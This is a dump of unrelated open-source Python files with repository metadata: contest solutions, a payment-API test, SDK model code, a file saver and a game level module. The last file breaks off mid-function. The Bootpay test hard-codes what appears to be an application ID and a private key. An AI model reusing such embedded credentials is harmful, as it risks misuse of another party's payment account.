print("Writing ECG projections in %s" % ecg_proj_fname)
mne.write_proj(ecg_proj_fname, projs)
print("Writing ECG events in %s" % ecg_event_fname)
mne.write_events(ecg_event_fname, events)
| 40.379808 | 130 | 0.556971 |
e1fba5d13c536e800e4a197861ca00fae6d88045 | 1,516 | py | Python | 1/kiwi_juice.py | SakiFu/top-coder | 6ee54b6481acf9d2b4dd315cdb1fee30de9a5a4d | [
"MIT"
] | null | null | null | 1/kiwi_juice.py | SakiFu/top-coder | 6ee54b6481acf9d2b4dd315cdb1fee30de9a5a4d | [
"MIT"
] | null | null | null | 1/kiwi_juice.py | SakiFu/top-coder | 6ee54b6481acf9d2b4dd315cdb1fee30de9a5a4d | [
"MIT"
] | null | null | null | import math
"""
Taro has prepared delicious kiwi fruit juice. He poured it into N bottles numbered from 0 to N -1.
The capacity of the i-th bottle is capacities[i] liters, and he poured juice[i] liters of kiwi juice into this bottle.
Now he wants to redistribute juice in the bottles.
In order to do this, he will perform M operations numbered from 0 to M-1 in the order in which he will perform them.
For the i-th operation, he will pour kiwi juice from bottle from_id[i] to bottle to_id[i].
He will stop pouring when bottle from_id[i] becomes empty or bottle to_id[i] becomes full, whichever happens earlier.
Return an int[] that contains exactly N elements and whose i-th element is the amount of kiwi juice in the i-th bottle
after all pouring operations are finished.
Example:
capacities = [20, 20]
juice = [5,8]
from_id = [0]
to_id = [1]
Output : [0,13]
"""
def kiwi_juice1(capacities, juice, from_id, to_id):
for i in range(len(from_id)):
f = from_id[i]
t = to_id[i]
space = capacities[t] - juice[t]
if space >= juice[f]:
vol = juice[f]
juice[t] += vol
juice[f] = 0
else:
vol = space
juice[t] += vol
juice[f] -= vol
return juice
def kiwi_juice2(capacities, juice, from_id, to_id):
for i in range(len(from_id)):
f = from_id[i]
t = to_id[i]
vol = min(juice[f], capacities[t] - juice[t])
juice[f] -= vol
juice[t] += vol
return juice | 32.956522 | 119 | 0.639182 |
8d64be0e1beb46125a75be4ad90865f8c4981b2d | 563 | py | Python | Solutions/16/Printer.py | hosseindehghanipour1998/Python-Training | 8825f43c9b843d927453b555b84674f609501264 | [
"MIT"
] | 1 | 2019-11-03T15:12:28.000Z | 2019-11-03T15:12:28.000Z | Solutions/16/Printer.py | hosseindehghanipour1998/python2-sample-questions | 8825f43c9b843d927453b555b84674f609501264 | [
"MIT"
] | null | null | null | Solutions/16/Printer.py | hosseindehghanipour1998/python2-sample-questions | 8825f43c9b843d927453b555b84674f609501264 | [
"MIT"
] | null | null | null | #Q2-a
def a(x):
i = 1
while i<x:
print i,
i+=1
while x>0:
print x,
x-=1
#-----------------------------------
#Q2-b
def b(x):
print x*" ",
'''
or we can use this one:
def b(x):
while i<x:
print " ",
'''
#-----------------------------------
#Q2-c
def c(x):
line = 1
while line<=x:
b(x - line)
a(line)
print
line+=1
line-=2
while line>0:
b(x-line)
a(line)
print
line-=1
'''
c(8)
'''
| 13.093023 | 36 | 0.301954 |
1f013aad029a9dff945e7367ae51240bcca2dcc6 | 4,887 | py | Python | Round F/festival2.py | romilxz/GoogleKickStart-2021 | 383f28ee7c6041e176db5f8388eed1564c5c4347 | [
"MIT"
] | 76 | 2021-03-21T14:13:32.000Z | 2022-03-20T03:30:06.000Z | Round F/festival2.py | romilxz/GoogleKickStart-2021 | 383f28ee7c6041e176db5f8388eed1564c5c4347 | [
"MIT"
] | 3 | 2021-05-10T13:40:21.000Z | 2021-12-19T17:33:12.000Z | Round F/festival2.py | romilxz/GoogleKickStart-2021 | 383f28ee7c6041e176db5f8388eed1564c5c4347 | [
"MIT"
] | 32 | 2021-03-21T15:07:05.000Z | 2022-03-18T21:53:34.000Z | # Copyright (c) 2021 kamyu. All rights reserved.
#
# Google Kick Start 2021 Round F - Problem B. Festival
# https://codingcompetitions.withgoogle.com/kickstart/round/0000000000435bae/0000000000887dba
#
# Time: O(NlogN), pass in PyPy2 but Python2
# Space: O(N)
#
from random import randint, seed
# Template:
# https://github.com/kamyu104/GoogleKickStart-2021/blob/master/Round%20D/final_exam.py
class SkipNode(object):
def __init__(self, level=0, val=None):
self.val = val
self.nexts = [None]*level
self.prevs = [None]*level
class SkipList(object):
P_NUMERATOR, P_DENOMINATOR = 1, 2 # P = 1/4 in redis implementation
MAX_LEVEL = 32 # enough for 2^32 elements
def __init__(self, end=float("inf"), can_duplicated=True):
seed(0)
self.__head = SkipNode()
self.__len = 0
self.__can_duplicated = can_duplicated
self.add(end)
self.__end = self.find(end)
def begin(self):
return self.__head.nexts[0]
def end(self):
return self.__end
def lower_bound(self, target, cmp=lambda x, y: x < y):
return self.__lower_bound(self.__find_prev_nodes(target, cmp))
def find(self, target):
return self.__find(target, self.__find_prev_nodes(target))
def add(self, val):
if not self.__can_duplicated and self.find(val):
return self.find(val), False
node = SkipNode(self.__random_level(), val)
if len(self.__head.nexts) < len(node.nexts):
self.__head.nexts.extend([None]*(len(node.nexts)-len(self.__head.nexts)))
prevs = self.__find_prev_nodes(val)
for i in xrange(len(node.nexts)):
node.nexts[i] = prevs[i].nexts[i]
if prevs[i].nexts[i]:
prevs[i].nexts[i].prevs[i] = node
prevs[i].nexts[i] = node
node.prevs[i] = prevs[i]
self.__len += 1
return node if self.__can_duplicated else (node, True)
def remove(self, it):
prevs = it.prevs
curr = self.__find(it.val, prevs)
if not curr:
return self.__end
self.__len -= 1
for i in reversed(xrange(len(curr.nexts))):
prevs[i].nexts[i] = curr.nexts[i]
if curr.nexts[i]:
curr.nexts[i].prevs[i] = prevs[i]
if not self.__head.nexts[i]:
self.__head.nexts.pop()
return curr.nexts[0]
def __lower_bound(self, prevs):
if prevs:
candidate = prevs[0].nexts[0]
if candidate:
return candidate
return None
def __find(self, val, prevs):
candidate = self.__lower_bound(prevs)
if candidate and candidate.val == val:
return candidate
return None
def __find_prev_nodes(self, val, cmp=lambda x, y: x < y):
prevs = [None]*len(self.__head.nexts)
curr = self.__head
for i in reversed(xrange(len(self.__head.nexts))):
while curr.nexts[i] and cmp(curr.nexts[i].val, val):
curr = curr.nexts[i]
prevs[i] = curr
return prevs
def __random_level(self):
level = 1
while randint(1, SkipList.P_DENOMINATOR) <= SkipList.P_NUMERATOR and \
level < SkipList.MAX_LEVEL:
level += 1
return level
def __iter__(self):
it = self.begin()
while it != self.end():
yield it.val
it = it.nexts[0]
def __len__(self):
return self.__len-1 # excluding end node
def __str__(self):
result = []
for i in reversed(xrange(len(self.__head.nexts))):
result.append([])
curr = self.__head.nexts[i]
while curr:
result[-1].append(str(curr.val))
curr = curr.nexts[i]
return "\n".join(map(lambda x: "->".join(x), result))
def festival():
D, N, K = map(int, raw_input().strip().split())
points = []
for _ in xrange(N):
h, s, e = map(int, raw_input().strip().split())
points.append((s, 1, h))
points.append((e+1, -1, h))
points.sort()
sl, it = SkipList(), None
result = curr = 0
for _, c, h in points:
if c == 1:
sl.add(-h)
if len(sl) <= K:
curr += h
it = sl.end().prevs[0]
elif h >= -it.val:
curr -= -it.val
curr += h
it = it.prevs[0]
result = max(result, curr)
else:
sl.remove(sl.find(-h))
if len(sl) < K:
curr -= h
it = sl.end().prevs[0]
elif h >= -it.val:
curr -= h
curr += -it.nexts[0].val
it = it.nexts[0]
return result
for case in xrange(input()):
print 'Case #%d: %s' % (case+1, festival())
| 31.127389 | 93 | 0.54246 |
2996cd8f55fb01337ae1b28b08405a27b690ff98 | 785 | py | Python | test/request_subscribe_rest.py | bootpay/server_python | fd288e0f85e272587a564da2bdd1a1ef3a49380d | [
"MIT"
] | 2 | 2018-12-20T07:52:39.000Z | 2019-11-17T16:07:39.000Z | test/request_subscribe_rest.py | bootpay/server_python | fd288e0f85e272587a564da2bdd1a1ef3a49380d | [
"MIT"
] | null | null | null | test/request_subscribe_rest.py | bootpay/server_python | fd288e0f85e272587a564da2bdd1a1ef3a49380d | [
"MIT"
] | 5 | 2018-12-31T00:42:05.000Z | 2022-03-23T10:05:52.000Z | import sys
import os
import time
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from lib.BootpayApi import BootpayApi
bootpay = BootpayApi('5b8f6a4d396fa665fdc2b5ea', 'rm6EYECr6aroQVG2ntW0A6LpWnkTgP4uQ3H18sDDUYw=')
result = bootpay.get_access_token()
if result['status'] is 200:
response = bootpay.get_subscribe_billing_key(
'nicepay',
str(time.time()),
'30일 결제권',
'[ 카드 번호 ]',
'[ 카드 비밀번호 앞자리 2개 ]',
'[ 카드 만료 연도 2자리 ]',
'[ 카드 만료 월 2자리 ]',
'[ 카드 소유주 생년월일 혹은 사업자 등록번호 ]',
None,
{
'subscribe_test_payment': 1
}
)
print(response)
# Billing key를 취소할 때 쓰는 API
print(
bootpay.destroy_subscribe_billing_key(result['data']['billing_key'])
)
| 23.787879 | 96 | 0.601274 |
c8b336e342865a7ab2e4f501cadfad78e74c2313 | 8,559 | py | Python | sdk/lusid/models/paged_resource_list_of_property_definition_search_result.py | finbourne/lusid-sdk-python-generated-preview | 9c36c953e8149443a4390ed7f0c04d01211401b6 | [
"MIT"
] | null | null | null | sdk/lusid/models/paged_resource_list_of_property_definition_search_result.py | finbourne/lusid-sdk-python-generated-preview | 9c36c953e8149443a4390ed7f0c04d01211401b6 | [
"MIT"
] | null | null | null | sdk/lusid/models/paged_resource_list_of_property_definition_search_result.py | finbourne/lusid-sdk-python-generated-preview | 9c36c953e8149443a4390ed7f0c04d01211401b6 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.11.4425
Contact: info@finbourne.com
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from lusid.configuration import Configuration
class PagedResourceListOfPropertyDefinitionSearchResult(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
required_map (dict): The key is attribute name
and the value is whether it is 'required' or 'optional'.
"""
openapi_types = {
'next_page': 'str',
'previous_page': 'str',
'values': 'list[PropertyDefinitionSearchResult]',
'href': 'str',
'links': 'list[Link]'
}
attribute_map = {
'next_page': 'nextPage',
'previous_page': 'previousPage',
'values': 'values',
'href': 'href',
'links': 'links'
}
required_map = {
'next_page': 'optional',
'previous_page': 'optional',
'values': 'required',
'href': 'optional',
'links': 'optional'
}
def __init__(self, next_page=None, previous_page=None, values=None, href=None, links=None, local_vars_configuration=None): # noqa: E501
"""PagedResourceListOfPropertyDefinitionSearchResult - a model defined in OpenAPI"
:param next_page: The next page of results.
:type next_page: str
:param previous_page: The previous page of results.
:type previous_page: str
:param values: The resources to list. (required)
:type values: list[lusid.PropertyDefinitionSearchResult]
:param href: The URI of the resource list.
:type href: str
:param links: Collection of links.
:type links: list[lusid.Link]
""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self._next_page = None
self._previous_page = None
self._values = None
self._href = None
self._links = None
self.discriminator = None
self.next_page = next_page
self.previous_page = previous_page
self.values = values
self.href = href
self.links = links
@property
def next_page(self):
"""Gets the next_page of this PagedResourceListOfPropertyDefinitionSearchResult. # noqa: E501
The next page of results. # noqa: E501
:return: The next_page of this PagedResourceListOfPropertyDefinitionSearchResult. # noqa: E501
:rtype: str
"""
return self._next_page
@next_page.setter
def next_page(self, next_page):
"""Sets the next_page of this PagedResourceListOfPropertyDefinitionSearchResult.
The next page of results. # noqa: E501
:param next_page: The next_page of this PagedResourceListOfPropertyDefinitionSearchResult. # noqa: E501
:type next_page: str
"""
self._next_page = next_page
@property
def previous_page(self):
"""Gets the previous_page of this PagedResourceListOfPropertyDefinitionSearchResult. # noqa: E501
The previous page of results. # noqa: E501
:return: The previous_page of this PagedResourceListOfPropertyDefinitionSearchResult. # noqa: E501
:rtype: str
"""
return self._previous_page
@previous_page.setter
def previous_page(self, previous_page):
"""Sets the previous_page of this PagedResourceListOfPropertyDefinitionSearchResult.
The previous page of results. # noqa: E501
:param previous_page: The previous_page of this PagedResourceListOfPropertyDefinitionSearchResult. # noqa: E501
:type previous_page: str
"""
self._previous_page = previous_page
@property
def values(self):
"""Gets the values of this PagedResourceListOfPropertyDefinitionSearchResult. # noqa: E501
The resources to list. # noqa: E501
:return: The values of this PagedResourceListOfPropertyDefinitionSearchResult. # noqa: E501
:rtype: list[lusid.PropertyDefinitionSearchResult]
"""
return self._values
@values.setter
def values(self, values):
"""Sets the values of this PagedResourceListOfPropertyDefinitionSearchResult.
The resources to list. # noqa: E501
:param values: The values of this PagedResourceListOfPropertyDefinitionSearchResult. # noqa: E501
:type values: list[lusid.PropertyDefinitionSearchResult]
"""
if self.local_vars_configuration.client_side_validation and values is None: # noqa: E501
raise ValueError("Invalid value for `values`, must not be `None`") # noqa: E501
self._values = values
@property
def href(self):
"""Gets the href of this PagedResourceListOfPropertyDefinitionSearchResult. # noqa: E501
The URI of the resource list. # noqa: E501
:return: The href of this PagedResourceListOfPropertyDefinitionSearchResult. # noqa: E501
:rtype: str
"""
return self._href
@href.setter
def href(self, href):
"""Sets the href of this PagedResourceListOfPropertyDefinitionSearchResult.
The URI of the resource list. # noqa: E501
:param href: The href of this PagedResourceListOfPropertyDefinitionSearchResult. # noqa: E501
:type href: str
"""
self._href = href
@property
def links(self):
"""Gets the links of this PagedResourceListOfPropertyDefinitionSearchResult. # noqa: E501
Collection of links. # noqa: E501
:return: The links of this PagedResourceListOfPropertyDefinitionSearchResult. # noqa: E501
:rtype: list[lusid.Link]
"""
return self._links
@links.setter
def links(self, links):
"""Sets the links of this PagedResourceListOfPropertyDefinitionSearchResult.
Collection of links. # noqa: E501
:param links: The links of this PagedResourceListOfPropertyDefinitionSearchResult. # noqa: E501
:type links: list[lusid.Link]
"""
self._links = links
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(
lambda x: convert(x),
value
))
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], convert(item[1])),
value.items()
))
else:
result[attr] = convert(value)
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, PagedResourceListOfPropertyDefinitionSearchResult):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, PagedResourceListOfPropertyDefinitionSearchResult):
return True
return self.to_dict() != other.to_dict()
| 32.05618 | 140 | 0.626241 |
9b661acb15724c1bd487d54e97db991ff3c3e20d | 3,797 | py | Python | src/python/src/utils/file_saver.py | halimov-oa/scrapy-boilerplate | fe3c552fed26bedb0618c245ab923aa34a89ac9d | [
"MIT"
] | null | null | null | src/python/src/utils/file_saver.py | halimov-oa/scrapy-boilerplate | fe3c552fed26bedb0618c245ab923aa34a89ac9d | [
"MIT"
] | null | null | null | src/python/src/utils/file_saver.py | halimov-oa/scrapy-boilerplate | fe3c552fed26bedb0618c245ab923aa34a89ac9d | [
"MIT"
] | null | null | null | import cgi
import mimetypes
import os
import pathlib
import re
from html import unescape
from typing import Optional, Tuple
from uuid import uuid4
from urllib.parse import unquote
from furl import furl
from scrapy.http import Response
class FileSaver:
folder_size: int
folder_number: int
select_folder: str
def __init__(self, base_folder: str, bucket_prefix: str, max_bucket_size: int):
self.base_folder: str = os.path.abspath(base_folder)
self.bucket_prefix: str = bucket_prefix
self.max_bucket_size: int = max_bucket_size # maximum number of files
if not os.path.exists(self.base_folder):
os.mkdir(self.base_folder)
sequence = [
(folder.name, int(folder.name.replace(self.bucket_prefix, '')))
for folder in os.scandir(self.base_folder)
if folder.is_dir() and self.bucket_prefix in folder.name
]
if sequence:
folder_name, max_folder_number = max(sequence, key=lambda result: result[1])
else:
max_folder_number = 1
folder_name = ''.join([self.bucket_prefix, str(max_folder_number)])
self.folder_number: int = max_folder_number
self.select_folder = os.path.join(self.base_folder, folder_name)
if os.path.exists(self.select_folder):
self.folder_size = len(next(os.walk(self.select_folder))[2])
else:
os.mkdir(self.select_folder)
self.folder_size = 0
if self._is_folder_full():
self._change_folder()
def _increment_folder_size(self) -> None:
self.folder_size += 1
def _change_folder(self) -> None:
self.folder_number += 1
self.select_folder = os.path.join(
self.base_folder,
''.join([self.bucket_prefix, str(self.folder_number)])
)
self.folder_size = 0
if not os.path.exists(self.select_folder):
os.mkdir(self.select_folder)
def _is_folder_full(self) -> bool:
return self.folder_size >= self.max_bucket_size
def save_file(
self,
response: Response,
filename_prefix: str = '',
filename: Optional[str] = None
) -> Tuple[str, str]:
if 'Content-Type' in response.headers:
content_type: str = response.headers['Content-Type'].decode()
if content_type.startswith('image/') or \
content_type.startswith('audio/') or \
content_type.startswith('application/pdf'):
raw_filename: str = furl(response.url).path.segments[-1]
raw_filename = re.search('^[^?;#.]*', raw_filename).group() + mimetypes.guess_extension(content_type)
else:
raise Exception('Unsupported content type')
elif 'Content-Disposition' in response.headers:
_, params = cgi.parse_header(response.headers['Content-Disposition'].decode())
if 'filename*' in params:
raw_filename: str = unquote(unescape(params['filename*'])).lstrip("utf-8''")
else:
raw_filename: str = unescape(params['filename'])
else:
raise Exception('Unsupported file type')
original_filename = re.sub('[~/]', '_', raw_filename)
file_type = pathlib.Path(original_filename).suffix
if not filename:
filename: str = str(uuid4().hex)
filename = filename_prefix + filename
path_to_file: str = os.path.join(self.select_folder, f'{filename}{file_type}')
with open(path_to_file, 'wb') as writer:
writer.write(response.body)
self._increment_folder_size()
if self._is_folder_full():
self._change_folder()
return path_to_file, original_filename
| 34.207207 | 117 | 0.624704 |
26431c64510748aee61329bbbd39815af5d0ec6e | 21,960 | py | Python | typingdefense/level.py | Juzley/typingdefense | 8adbd0d4e02bcd8ac1a1c827efb0e7c740bded82 | [
"MIT"
] | null | null | null | typingdefense/level.py | Juzley/typingdefense | 8adbd0d4e02bcd8ac1a1c827efb0e7c740bded82 | [
"MIT"
] | null | null | null | typingdefense/level.py | Juzley/typingdefense | 8adbd0d4e02bcd8ac1a1c827efb0e7c740bded82 | [
"MIT"
] | null | null | null | """Module containing all classes required to represent and handle a level."""
import math
import numpy
import weakref
import json
import copy
import ctypes
from collections import deque
from enum import Enum, unique
from OpenGL import GL
import typingdefense.glutils as glutils
import typingdefense.camera as camera
import typingdefense.vector as vector
import typingdefense.enemy as enemy
import typingdefense.util as util
import typingdefense.hud as hud
import typingdefense.phrasebook as phrasebook
def _cube_round(fc):
"""Round fractional cube-format hex coordinates."""
rx = round(fc.x)
ry = round(fc.y)
rz = round(fc.z)
x_diff = abs(rx - fc.x)
y_diff = abs(ry - fc.y)
z_diff = abs(rz - fc.z)
if x_diff > y_diff and x_diff > z_diff:
rx = -ry - rz
elif y_diff > z_diff:
ry = -rx - rz
else:
rz = -rx - ry
return vector.Vector(rx, ry, rz)
def _hex_round(fh):
"""Round fractional axial-format hex coordinates."""
return _cube_to_hex(_cube_round(_hex_to_cube(fh)))
def _hex_to_cube(h):
"""Convert axial-format hex coordinates to cube-format."""
return vector.Vector(h.q, -h.q - h.r, h.r)
def _cube_to_hex(c):
"""Convert cube-format hex coordinates to hex."""
return vector.Vector(c.x, c.z)
class Tile(object):
"""Class representing a single tile in a level."""
SIZE = 1
DEPTH = 2
HEIGHT = SIZE * 2
WIDTH = SIZE * (math.sqrt(3)/2) * HEIGHT
VERT_SPACING = HEIGHT * 0.75
HORIZ_SPACING = WIDTH
def __init__(self, app, cam, coords, height, colour):
"""Construct a (hexagonal) tile.
coords is a vector containing the horizontal coordinates of the tile,
using axial coordinates.
height is the number of stacks in the tile.
"""
self.coords = coords
self.height = height
self.colour = colour
self.path_next = None
self.tower = None
self._shader = glutils.ShaderInstance(
app, 'level.vs', 'level.fs',
[('transMatrix', GL.GL_FLOAT_MAT4, cam.trans_matrix_as_array()),
('colourIn', GL.GL_FLOAT_VEC4, None)])
self._hex = glutils.Hex(vector.Vector(self.x, self.y, 0),
Tile.SIZE, Tile.DEPTH, height)
self.outline_colour = colour
self.face_colour = copy.copy(self.outline_colour)
self.face_colour.s = self.face_colour.s / 2
# Dictionary of waves, keyed by the level phase in which they appear.
self.waves = {}
# Whether the tile is a 'slow movement' tile.
self.slow = False
@property
def q(self):
"""The axial q coord of the tile."""
return self.coords.q
@property
def r(self):
"""The axial r coord of the tile."""
return self.coords.r
@property
def x(self):
"""Calculate the x value of the world location of the tile center."""
return Tile.SIZE * math.sqrt(3) * (self.q + self.r / 2)
@property
def y(self):
"""Calculate the y value of the world location of the tile center."""
return Tile.SIZE * (3 / 2) * self.r
@property
def top(self):
"""Calculate the world Z coord of the top of the tile."""
return self.height * Tile.HEIGHT
@staticmethod
def world_to_tile_coords(world_coords):
"""Convert world (x, y) coordinates to tile (q, r) coordinates.
Note that this is a 2D conversion only."""
q = (world_coords.x * math.sqrt(3) / 3 - world_coords.y / 3) / Tile.SIZE
r = (world_coords.y * 2 / 3) / Tile.SIZE
return _hex_round(vector.Vector(q, r))
@property
def empty(self):
"""Indicate whether the tile has a tower on it."""
return self.tower is None
def draw(self, outline=True, faces=True,
outline_colour=None, face_colour=None):
"""Draw the tile."""
with self._shader.use(download_uniforms=False):
self._shader.set_uniform('transMatrix')
if faces:
if face_colour is None:
self._shader.set_uniform('colourIn', self.face_colour)
else:
self._shader.set_uniform('colourIn', face_colour)
self._hex.draw_faces()
if outline:
if outline_colour is None:
self._shader.set_uniform('colourIn', self.outline_colour)
else:
self._shader.set_uniform('colourIn', outline)
with glutils.linewidth(2):
self._hex.draw_outline()
def picking_draw(self, picking_shader):
"""Draw to the picking framebuffer.
This allows us to determine which tile was hit by mouse events.
"""
picking_shader.set_uniform('colourIn',
[self.coords.q, self.coords.r, 0, 0])
self._hex.draw_faces()
class Base(object):
"""Class representing the player's base."""
START_HEALTH = 100
def __init__(self, app, cam, tile, origin, z):
self.health = Base.START_HEALTH
self.tile = tile
self._shader = glutils.ShaderInstance(
app, 'level.vs', 'level.fs',
[('transMatrix', GL.GL_FLOAT_MAT4, cam.trans_matrix_as_array())])
self._hex = glutils.Hex(vector.Vector(tile.x, tile.y, 0),
Tile.SIZE * 0.8, Tile.DEPTH, 2)
def draw(self):
"""Draw the base."""
with self._shader.use():
self._hex.draw()
def damage(self, dmg):
self.health -= dmg
# TODO: Death
class Level(object):
"""Class representing a game level."""
@unique
class State(Enum):
"""Enumeration of different level states."""
defend = 1
build = 2
def __init__(self, app, game):
self._app = app
self.cam = camera.Camera(
origin=[0, -30, 60], target=[0, 0, 0], up=[0, 1, 0], fov=50,
screen_width=app.window_width, screen_height=app.window_height,
near=0.1, far=1000)
self.phrases = phrasebook.PhraseBook('resources/phrases/all.phr')
# Level state
self.timer = util.Timer()
self.money = 0
self.state = Level.State.build
self._target = None
self._phase = 0
self._towers = []
self.enemies = []
self.waves = []
self.tower_creator = None
# Map/graphics etc.
self._min_coords = None
self._max_coords = None
self.tiles = None
self.base = None
self.load()
self._vao = None
self._vbo = None
self._shader = glutils.ShaderInstance(
self._app, 'level2.vs', 'level2.fs',
[('transMatrix', GL.GL_FLOAT_MAT4,
self.cam.trans_matrix_as_array()),
('colourIn', GL.GL_FLOAT_VEC4, [1, 1, 1, 1])])
self._build_vertex_arrays()
self._picking_texture = glutils.PickingTexture(app.window_width,
app.window_height)
self._picking_shader = glutils.ShaderInstance(
app, 'level.vs', 'picking.fs',
[['transMatrix', GL.GL_FLOAT_MAT4,
self.cam.trans_matrix_as_array()],
['colourIn', GL.GL_FLOAT_VEC4, [0, 0, 0, 0]]])
self.picking_draw()
self._hud = hud.Hud(app, self)
def load(self):
"""Load the level."""
self._min_coords = vector.Vector(-100, -100)
self._max_coords = vector.Vector(100, 100)
width = self._max_coords.x - self._min_coords.x + 1
height = self._max_coords.y - self._min_coords.y + 1
self.tiles = numpy.empty([height, width], dtype=object)
try:
with open('resources/levels/test_level.tdl', 'r') as f:
lvl_info = json.load(f)
# Load tiles
for tile_info in lvl_info['tiles']:
coords = vector.Vector(tile_info['q'], tile_info['r'])
colour = util.Colour(tile_info['colour']['r'],
tile_info['colour']['g'],
tile_info['colour']['b'],
tile_info['colour']['a'])
idx = self.tile_coords_to_array_index(coords)
self.tiles[idx.y, idx.x] = Tile(self._app,
self.cam,
coords,
tile_info['height'],
colour)
# Load Waves
phase_idx = 0
if 'waves' in lvl_info:
for phase_info in lvl_info['waves']:
waves = []
for wave_info in phase_info:
coords = vector.Vector(wave_info['q'],
wave_info['r'])
tile = self.lookup_tile(coords)
wave = enemy.Wave(
self._app, self, tile,
enemy_count=wave_info['enemy_count'],
start_time=wave_info['start_time'],
spawn_gap=wave_info['spawn_gap'],
enemy_type=wave_info['enemy_type'])
tile.waves[phase_idx] = wave
waves.append(wave)
self.waves.append(waves)
phase_idx += 1
except FileNotFoundError:
pass
tile = self.lookup_tile(vector.Vector(0, 0))
self.base = Base(self._app, self.cam, tile, vector.Vector(0, 0),
Tile.HEIGHT)
self.money = 500
def save(self):
"""Save the edited level to file."""
level = {}
level['name'] = 'Test Level'
tiles = []
for _, tile in numpy.ndenumerate(self.tiles):
if tile:
colour = {'r': tile.colour.r,
'g': tile.colour.g,
'b': tile.colour.b,
'a': tile.colour.a}
tiles.append({'q': tile.q, 'r': tile.r, 'height': tile.height,
'colour': colour})
level['tiles'] = tiles
phases = []
for phase in self.waves:
waves = []
for wave in phase:
waves.append({'q': wave.tile.q, 'r': wave.tile.r,
'enemy_type': wave.enemy_type.__name__,
'enemy_count': wave.enemy_count,
'start_time': wave.start_time,
'spawn_gap': wave.spawn_gap})
phases.append(waves)
level['waves'] = phases
with open('resources/levels/test_level.tdl', 'w') as f:
json.dump(level, f)
def picking_draw(self):
"""Draw the tiles to the picking buffer."""
with self._picking_texture.enable():
with self._picking_shader.use(download_uniforms=False):
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
self._picking_shader.set_uniform('transMatrix')
for tile_list in self.tiles:
for tile in tile_list:
if tile:
tile.picking_draw(self._picking_shader)
def draw(self):
"""Draw the level."""
self._draw_vertex_arrays()
self.base.draw()
for tower in self._towers:
tower.draw()
for e in self.enemies:
e.draw()
self._hud.draw()
def play(self):
"""Move from build into play state."""
if self.state == Level.State.build:
self._build_paths()
self._hud.animate_defend_phase_start()
self.state = Level.State.defend
self._phase += 1
def update(self):
"""Advance the game state."""
self.timer.update()
if self.state == Level.State.defend:
# Update enemies
for e in self.enemies:
e.update(self.timer)
for e in [e for e in self.enemies if e.unlink]:
self.enemies.remove(e)
# Update towers
for tower in self._towers:
tower.update()
# Spawn new enemies
active_waves = False
for wave in self.waves[self._phase - 1]:
wave.update(self.timer)
if not wave.finished:
active_waves = True
# Check if the current phase is finished.
if not active_waves and len(self.enemies) == 0:
self._hud.animate_defend_phase_end()
self.state = Level.State.build
# TODO: Check if we've finished the last phase.
def on_click(self, x, y, button):
"""Handle a mouse click."""
if self.state == Level.State.build:
hit_hud = self._hud.on_click(x, y)
if not hit_hud:
tile = self.screen_coords_to_tile(vector.Vector(x, y))
if tile and tile.empty:
# TODO: Check if the tower ends up leaving no route to the
# base
if (self.tower_creator is not None and
self.money >= self.tower_creator.COST):
tower = self.tower_creator(self._app, self, tile)
self._towers.append(tower)
tile.tower = tower
self.money -= tower.COST
def on_keydown(self, key):
"""Handle keydown events."""
pass
def on_text(self, c):
"""Handle text input."""
self._update_target(c)
if self._target and self._target():
target = self._target()
target.on_text(c)
def add_enemy(self, e):
"""Add an enemy to the level."""
self.enemies.append(e)
def tile_coords_to_array_index(self, coords):
"""Work out the array slot for a given set of axial tile coords."""
return vector.Vector(coords.q - self._min_coords.q,
coords.r - self._min_coords.r)
def iter_tiles(self):
"""Generator function for the level's tiles."""
for tile_list in self.tiles:
for tile in tile_list:
if tile is not None:
yield tile
def lookup_tile(self, coords):
"""Look up a tile from its (q, r) coordinates."""
if not self.tile_coords_valid:
return None
index = self.tile_coords_to_array_index(coords)
return self.tiles[index.y, index.x]
def screen_coords_to_tile(self, coords):
"""Work out which tile a given point in screen coordinates is in."""
pixel_info = self._picking_texture.read(coords.x, coords.y)
# The blue value will be 0 if no tile was hit
if pixel_info[2] == 0:
return None
# The q and r coordinates are stored in the r and g values, respectively
return self.lookup_tile(vector.Vector(pixel_info[0], pixel_info[1]))
def screen_coords_to_tile_coords(self, coords):
"""Convert screen coordinates to tile coordinates.
Returns a vector containing the coordinates on the q and r axes.
This will return a value even if there is no tile currently at the
coordinates (in contrast to screen_coords_to_tile). This does not
take into account the height of tiles - it unprojects the click to
world-space with a Z-value of 0."""
world_coords = self.cam.unproject(coords, 0)
return Tile.world_to_tile_coords(world_coords)
def tile_coords_valid(self, tc):
"""Determine whether a given set of tile coordinates is within range."""
return (tc.q >= self._min_coords.q and tc.q <= self._max_coords.q and
tc.r >= self._min_coords.r and tc.r <= self._max_coords.r)
def tile_neighbours(self, tile):
"""Find the neighbouring tiles for a given tile.
Takes a Tile and returns a list of Tiles.
Does not consider whether a given tile is empty or not.
"""
dirs = [(+1, 0), (+1, -1), (0, -1), (-1, 0), (-1, 1), (0, 1)]
neighbours = []
for d in dirs:
neighbour_coords = vector.Vector(tile.q + d[0], tile.r + d[1])
neighbour = self.lookup_tile(neighbour_coords)
if neighbour:
